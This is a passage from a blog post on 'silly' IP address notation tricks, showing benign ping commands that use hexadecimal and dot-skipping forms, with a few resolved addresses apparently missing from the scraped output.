$ ping 0xC1EFD324
PING 0xC1EFD324 ( 56 data bytes
64 bytes from icmp_seq=0 ttl=57 time=18.277 ms


Skipping A Dot

A great addition thanks to Petru's comment, is to skip a digit in the IP address.

$ ping 4.8
PING 4.8 ( 56 data bytes
64 bytes from icmp_seq=0 ttl=48 time=156.139 ms

The last digit-group is treated as the remainder of the values, so ping 4.8 actually expands to ping, because the digit '8' is treated like a 48bit 24bit integer.

If you ever want to have fun with a junior colleague, think of these examples. Especially the octal values are very easy to miss, if you place the leading zeros somewhere in the middle.

Oh and if you decide to test these examples, you'll be pinging one of our nameservers. No harm, feel free to.

The post Silly Little IP Tricks appeared first on

by Mattias Geniar at March 22, 2015 07:45 PM